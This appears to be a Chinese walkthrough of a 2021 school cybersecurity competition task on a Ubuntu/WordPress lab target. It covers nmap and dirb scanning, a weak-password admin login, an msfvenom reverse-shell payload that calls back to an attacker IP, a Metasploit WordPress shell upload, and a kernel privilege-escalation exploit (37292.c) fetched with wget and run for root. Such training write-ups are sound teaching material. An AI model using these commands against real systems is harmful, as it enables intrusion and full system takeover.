2021年中职“网络安全“江西省赛题—B-1:系统利用与提权

简介: 2021年中职“网络安全“江西省赛题—B-1:系统利用与提权

B-1:系统利用与提权


任务环境说明:

 服务器场景:PYsystem001

 服务器场景操作系统:Ubuntu(显示链接)

 服务器用户名:未知 密码:未知

  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;


nmap -sV ip 扫描

  1. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;


通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。

优先扫描特殊端口:dirb http://172.16.105.245:8080/

扫描出后台地址,通过题目提示弱口令登录

falg[admin,123456]

4. 利用Kali深入机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;

这里固定的falg:[Payload]

命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe

5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;


我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload

set rhost 172.16.105.245

set username admin

set password 123456

set targeturi /wordpress


260d7b0907e848ed9e04a790fefa1cc1.png


shell连接后whoami查看权限

falg[daemon]

7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;


命令:uname -a查看系统内核版本号

falg[3.13.0]

8. 在Kali攻击机中查找可使用的源码,将找到的源码文件名作为FLAG(形式:[文件名])提交;

利用kali中的searchsploit命令查看可使用的源码

命令searchsploit 3.13.0

falg[37292.c]

9. 利用上述源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/

启动kali的apche服务


使用python切换至交互式shell

命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’

使用命令wget把刚刚上传中37292.c文件下载下来


编译37292.c生成shell文件

运行shell文件,获得root权限

进入root目录查看txt文件名为adftutij.txt

flag[adftutij.txt]


11. 利用源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。

cat查看文件内容

flag[hyjufk983]






目录
相关文章
|
16小时前
|
监控 负载均衡 网络协议
|
2天前
|
存储 SQL 安全
网络防御先锋:洞悉网络安全漏洞与加固信息防线
【4月更文挑战第26天】 在数字化的浪潮中,网络安全和信息安全已成为守护每个组织和个人数据资产的堡垒。本文将深入探讨网络安全领域内常见的安全漏洞类型、加密技术的最新进展以及提升安全意识的重要性。通过对这些关键领域的剖析,读者将获得构建坚固信息防线的知识武装,以应对日益复杂的网络威胁。
13 5
|
2天前
|
机器学习/深度学习 算法 计算机视觉
m基于Yolov2深度学习网络的人体喝水行为视频检测系统matlab仿真,带GUI界面
MATLAB 2022a中使用YOLOv2算法对avi视频进行人体喝水行为检测,结果显示成功检测到目标。该算法基于全卷积网络,通过特征提取、锚框和损失函数优化实现。程序首先打乱并分割数据集,利用预训练的ResNet-50和YOLOv2网络结构进行训练,最后保存模型。
12 5
|
2天前
|
存储 安全 算法
网络防御先锋:洞悉漏洞、加密术与安全意识
【4月更文挑战第25天】 在数字化时代,网络安全与信息安全成为维系现代社会运行的基石。随着技术的发展,攻击手法不断进化,网络安全漏洞愈发难以防范。本文将深入探讨网络安全中的关键要素:漏洞识别与利用、加密技术的进展以及提升个体和企业的安全意识。通过分析这些关键要素,我们旨在为读者提供一套全面的知识框架,以应对日益复杂的网络威胁,并推动构建更加稳固的信息安全环境。
|
3天前
|
存储 安全 算法
构筑网络堡垒:洞悉网络安全漏洞与加密技术的融合之道
【4月更文挑战第25天】在数字时代的浪潮中,网络安全已成为维护信息完整性、确保数据流通安全的关键。本文深入探讨了网络安全领域内常见的安全漏洞及其成因,并分析了现代加密技术如何作为防御工具来弥补这些漏洞。同时,文章还强调了培养全民网络安全意识的重要性,以及通过教育与实践相结合的方式来提升整体社会的网络安全防护能力。
|
4天前
|
安全 JavaScript 前端开发
第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题—B模块安全事件响应/网络安全数据取证/应用安全
该内容描述了一次网络安全演练,包括七个部分:Linux渗透提权、内存取证、页面信息发现、数字取证调查、网络安全应急响应、Python代码分析和逆向分析。参与者需在模拟环境中收集Flag值,涉及任务如获取服务器信息、提权、解析内存片段、分析网络数据包、处理代码漏洞、解码逆向操作等。每个部分都列出了若干具体任务,要求提取或生成特定信息作为Flag提交。
9 0
|
4天前
|
安全 测试技术 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-C安全事件响应/网络安全数据取证/应用安全
B模块涵盖安全事件响应和应用安全,包括Windows渗透测试、页面信息发现、Linux系统提权及网络安全应急响应。在Windows渗透测试中,涉及系统服务扫描、DNS信息提取、管理员密码、.docx文件名及内容、图片中单词等Flag值。页面信息发现任务包括服务器端口、主页Flag、脚本信息、登录成功信息等。Linux系统渗透需收集SSH端口号、主机名、内核版本,并实现提权获取root目录内容和密码。网络安全应急响应涉及删除后门用户、找出ssh后门时间、恢复环境变量文件、识别修改的bin文件格式及定位挖矿病毒钱包地址。
10 0
|
4天前
|
安全 Linux 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B
网络安全模块A,涉及Windows和Linux服务器的安全加固。任务包括:设置强密码和登录策略,如账户锁定和最小密码长度;禁止未加密密码传输和来宾账户访问;关闭系统时清除内存页面文件,禁止无登录关机,限制驱动器访问;确保流量完整性,如SSL访问和SSH证书登录;事件监控,如应用日志存档;服务加固,如SSH禁止root远程登录,VSFTPD超时设置,IIS防止文件枚举和关闭WebDAV;以及防火墙策略,如限制DNS转发,禁止ping,禁用端口和MAC地址,限制IP碎片和SSH连接。所有更改需截图并按指定格式保存提交。
8 0
|
4天前
|
安全 Linux 网络安全
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A-CTF攻击与防御
模块C和D是CTF夺旗比赛,分别聚焦攻击和防御。攻击者需利用各种漏洞(如命令注入、文件上传、远程代码执行等)攻陷靶机,获取权限,但禁止攻击裁判服务器。防御者则需检测并加固堡垒服务器,确保服务可用性,发现并修补同样类型的漏洞。比赛分数依据靶机的flag值和加固报告,强调不提供补时。操作环境涉及Windows和Linux,选手需使用谷歌浏览器登录。注意提交清晰的截图和PDF报告至U盘。
7 0
|
4天前
|
安全 测试技术 Linux
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A模块安全事件响应/网络安全数据取证/应用安全
该内容描述了一个网络安全挑战,涉及Windows和Linux系统的渗透测试以及隐藏信息探索和内存取证。挑战包括使用Kali Linux对Windows Server进行服务扫描、DNS信息提取、密码获取、文件名和内容查找等。对于Linux系统,任务包括收集服务器信息、提权并查找特定文件内容和密码。此外,还有对Server2007网站的多步骤渗透,寻找登录界面和页面中的隐藏FLAG。最后,需要通过FTP获取win20230306服务器的内存片段,从中提取密码、地址、主机名、挖矿程序信息和浏览器搜索关键词。
8 0